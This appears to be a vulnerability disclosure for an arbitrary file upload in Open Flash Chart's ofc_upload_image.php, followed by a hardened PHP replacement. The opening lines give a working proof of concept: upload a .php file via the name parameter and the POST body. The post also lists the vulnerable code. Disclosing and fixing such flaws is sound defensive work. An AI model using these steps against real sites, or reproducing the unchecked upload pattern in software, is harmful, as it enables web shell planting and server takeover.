POST data to the vulnerable file to save a file with an arbitrary extension
Vulnerable file: /chart/php-ofc-library/ofc_upload_image.php

Exploitation:
/chart/php-ofc-library/ofc_upload_image.php?name=hfy.php (hfy.php is the file name)
POST arbitrary data:
Saved to: http://localhost/chart/tmp-upload-images/hfy.php


The vulnerable file is present in the latest wss version, even in the paid edition; the demo deployed on the Sina store has it too.

<?php

//
// In Open Flash Chart -> save_image debug mode, you
// will see the 'echo' text in a new window.
//

/*

print_r( $_GET );
print_r( $_POST );
print_r( $_FILES );

print_r( $GLOBALS );
print_r( $GLOBALS["HTTP_RAW_POST_DATA"] );

*/
// default path for the image to be stored //
$default_path = '../tmp-upload-images/';

if (!file_exists($default_path)) mkdir($default_path, 0777, true);

// full path to the saved image including filename //
// basename() only strips directory components; the extension of the
// caller-supplied name is never checked, so any file type can be saved
$destination = $default_path . basename( $_GET[ 'name' ] );

echo 'Saving your image to: '. $destination;
// print_r( $_POST );
// print_r( $_SERVER );
// echo $HTTP_RAW_POST_DATA;

//
// POST data is usually string data, but we are passing a RAW .png
// so PHP is a bit confused and $_POST is empty. But it has saved
// the raw bits into $HTTP_RAW_POST_DATA
//

// the request body is written to disk verbatim, with no authentication
// and no check that it is actually image data
$jfh = fopen($destination, 'w') or die("can't open file");
fwrite($jfh, $HTTP_RAW_POST_DATA);
fclose($jfh);

//
// LOOK:
//
exit();
//
// PHP5:
//

// default path for the image to be stored //
$default_path = 'tmp-upload-images/';

if (!file_exists($default_path)) mkdir($default_path, 0777, true);

// full path to the saved image including filename //
$destination = $default_path . basename( $_FILES[ 'Filedata' ][ 'name' ] );

// move the image into the specified directory //
if (move_uploaded_file($_FILES[ 'Filedata' ][ 'tmp_name' ], $destination)) {
    echo "The file " . basename( $_FILES[ 'Filedata' ][ 'name' ] ) . " has been uploaded;";
} else {
    echo "FILE UPLOAD FAILED";
}

?>

Fix:
This vulnerable file is a tragedy. How to fix it: add permission checks, extension validation and the like; sort it out yourself.
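
A hardened replacement for the raw-body branch of the upload handler, added here as an illustration of the fix described above; it is not the Open Flash Chart project's code and was not part of the original post. It assumes PHP 7 or later, that the application keeps an authenticated user id in $_SESSION['user_id'], and that uploads go to a directory outside the web root (the private-uploads path below is a placeholder); both the session key and the path are assumptions, not project conventions.

```php
<?php
// Added example, not the Open Flash Chart project's code.
// Assumptions (labelled): $_SESSION['user_id'] is set by the application's
// login flow, and $upload_dir is outside the document root.

session_start();

// 1. Authorisation: an anonymous request must not be able to write files.
if (empty($_SESSION['user_id'])) {
    http_response_code(403);
    exit('not authorised');
}

// 2. Accept only the image types the chart exporter produces, keyed by
//    extension and the MIME type the content must actually have.
$allowed = ['png' => 'image/png', 'jpg' => 'image/jpeg'];

$requested = isset($_GET['name']) ? (string) $_GET['name'] : '';
$ext = strtolower(pathinfo($requested, PATHINFO_EXTENSION));
if (!isset($allowed[$ext])) {
    http_response_code(400);
    exit('unsupported file type');
}

// 3. Read the raw body (php://input replaces $HTTP_RAW_POST_DATA) and
//    validate the content, not just the name the caller chose.
$data = file_get_contents('php://input');
if ($data === false || strlen($data) === 0 || strlen($data) > 5 * 1024 * 1024) {
    http_response_code(400);
    exit('bad body');
}
$finfo = new finfo(FILEINFO_MIME_TYPE);
if ($finfo->buffer($data) !== $allowed[$ext]) {
    http_response_code(400);
    exit('content does not match extension');
}
// getimagesizefromstring() parses the image header; a text payload with a
// spoofed magic number fails here.
if (@getimagesizefromstring($data) === false) {
    http_response_code(400);
    exit('not a valid image');
}

// 4. Never use the caller-supplied name on disk; generate an opaque one,
//    and create the directory without world-writable permissions.
$upload_dir = __DIR__ . '/../../private-uploads';   // assumed path outside web root
if (!is_dir($upload_dir) && !mkdir($upload_dir, 0750, true)) {
    http_response_code(500);
    exit('storage unavailable');
}
$stored = bin2hex(random_bytes(16)) . '.' . $ext;
$destination = $upload_dir . '/' . $stored;

if (file_put_contents($destination, $data, LOCK_EX) === false) {
    http_response_code(500);
    exit('write failed');
}
chmod($destination, 0640);

// 5. Return only the generated id; the user-controlled name is not echoed
//    back into the page, which also removes the reflected output in the
//    original 'Saving your image to:' line.
header('Content-Type: application/json');
echo json_encode(['id' => $stored]);
```

The three changes that matter are the session check (closes unauthenticated writes), the whitelist plus content sniffing (the name parameter now only selects between png and jpg, and the body must really be that image type), and the random on-disk name in a non-web-served directory (even if a check were bypassed, nothing the caller named is ever reachable as a URL). The original file's 0777 mkdir and world-readable write are also replaced with 0750/0640.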